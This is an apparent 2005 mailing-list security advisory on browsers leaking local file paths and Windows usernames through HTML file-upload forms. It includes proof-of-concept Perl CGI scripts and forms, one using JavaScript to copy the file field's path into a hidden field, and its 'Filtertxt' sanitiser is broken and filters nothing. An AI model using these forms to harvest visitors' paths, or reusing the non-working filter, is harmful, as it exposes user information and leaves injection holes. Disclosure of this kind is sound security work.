Multi browser sensitive information disclosure
I. DESCRIPTION:
Mr.upken disclosed this issue publicly on 19th Feb. 2005.
Here is his advisory.(language is Japanese)
http://xxx.upken.jp/report/ieup/
I have a few additional details to add to his original advisory.
II. IMPACT:
Disclosure of sensitive information to an unauthorised user.
III. TECHNICAL DETAILS:
RFC1867 is the standard definition of that "Browse..." button
that you use to upload files to a Web server.
It introduced the INPUT field type="file", which is that button,
and also specified a multipart form encoding which is capable of
encapsulating files for upload along with all the other fields
on an upload form.
As Mr.upken has mentioned in his advisory, there is a weakness in
"Form-based File Upload in HTML".
"When we use InternetExplorer" , he says ,"secret or sensitive
information can be exposed by an malicious people."
I have tested some examples, and it is found that Firefox, Opera,
and InternetExplorer have a weakness.( tested on WindowsXPSp2 )
IV. Proof of Concept [A].
server-side Perl CGI.(ask.cgi)
- ---------------------------
#!/usr/bin/perl
print "Content-Type: text/html\n\n";
die if $ENV{CONTENT_LENGTH} > 100*1024;
$objectname = "RFC1867";
$boundary = <STDIN>;
$boundary =~s /\r\n//;
while(<STDIN>){
if($_ =~ /$objectname/){
~s/\r\n//;
~s/"//g;
@dum = split(/filename=/, $_);
$rfc1867 = $dum[@dum - 1];
}
}
&Filtertxt( $rfc1867 );
print "$rfc1867\n";
exit(0);
sub Filtertxt {
local( $ft ) = @_;
$fd =~ s/[\<\>\"\'\%\;\)\(\&\+]//g;
return( $ft ) ;
}
- ---------------------------
client-side FORM.
- ---------------------------
<form name="XA" method="POST" enctype="multipart/form-data"
action="http://example.com/cgi-bin/ask.cgi";>
<input type="file" name="RFC1867">
<input type="hidden" name="XB" value="HIDDEN">
<input type=submit value="Upload">
</form>
- ---------------------------
NOTE:
Method is "POST".
When we upload a some file,
%USERNAME% , Path, etc... is disclosed.
I guess that only IE has a weakness.
V. Proof of Concept [B].
server-side Perl CGI.(named ask2.cgi)
- ---------------------------
#!/usr/bin/perl
if($ENV{'REQUEST_METHOD'} eq 'POST'){
#reads inputted variables through POST
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
}
else{
#reads inputted variables through GET
$buffer = $ENV{'QUERY_STRING'};
}
#splits the variables at &
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
#sets the value and name of each var
($name, $value) = split(/=/, $pair);
#makes each + into a space
$value =~ tr/+/ /;
#URL decode
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
#filter out bad characters & # < > " '
$value = &Filtertxt( $value );
#sets the varibles in a hash
$FORM{$name} = $value;
}
#print html .
print "Content-Type: text/html\n";
print "\n";
print "$FORM{'XB'}\n";
print "<br>\n";
print "$FORM{'RFC1867'}\n";
exit(0);
sub Filtertxt {
local( $ft ) = @_;
$fd =~ s/[\<\>\"\'\%\;\)\(\&\+]//g;
return( $ft ) ;
}
- ---------------------------
client-side FORM.
- ---------------------------
<form name="XA" method="GET" enctype="multipart/form-data"
action="http://example.com/cgi-bin/ask2.cgi";>
<input type="file" name="RFC1867">
<input type="hidden" name="XB" value="HIDDEN">
<input type=submit value="Upload">
</form>
- ---------------------------
NOTE:
Method is "GET".
When we try to upload a some file,
%USERNAME% , Path, etc... is disclosed.
I guess that both Opera and IE have a weakness.
V. Proof of Concept [C].
server-side Perl CGI is as same as Proof of Concept [B].
client-side FORM.
- ---------------------------
<form name="XA" method="GET" enctype="multipart/form-data"
action="http://example.com/cgi-bin/ask2.cgi";>
<input type="file" name="RFC1867">
<input type="hidden" name="XB" value="HIDDEN">
<input type=submit value="Upload"
onclick="document.XA.XB.value=document.XA.RFC1867.value;return true" >
</form>
- ---------------------------
NOTE:
Method is "GET".
When we try to upload a some file,
%USERNAME% , Path, etc... is disclosed.
I guess that all Firefox,Opera and IE have a weakness,
using evil JavaScript scripting.
VI. Other browser on Other OS.
not tested. But......
VII. Is this a vulnerability?
At once I had used InternetExplore as a FTP tool.
Today, when I am testing PoC3, browsing upload file,
using Firefox , I find
"MyNetwork - ftp02.websamba.com - mhtmlbug - scriptkitty.jpg"
and upload it to another server.
Then my monitor displays
C:\Documents and Settings\%USERNAME%\Local Settings\
Temporary Internet Files\Content.IE5\YB6J6PY3\scriptkitty[4].jpg
Oh,no. YB6J6PY3 !
It is no matter. I guess this is NOT a vulnerability, maybe.
VIII. Workaround
Do not upload any file onto untrusted server.
Do not attach any file ( while sending WebMAIL, posting ML,etc).
With killing JavaScript , use Firefox.
VIII. Credit
Discovery: upken
Additional Research: bitlance winter
BEST REGARDS.
--
bitlance winter
_________________________________________________________________
Don?t just search. Find. Check out the new MSN Search!
http://search.msn.click-url.com/go/onm00200636ave/direct/01/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
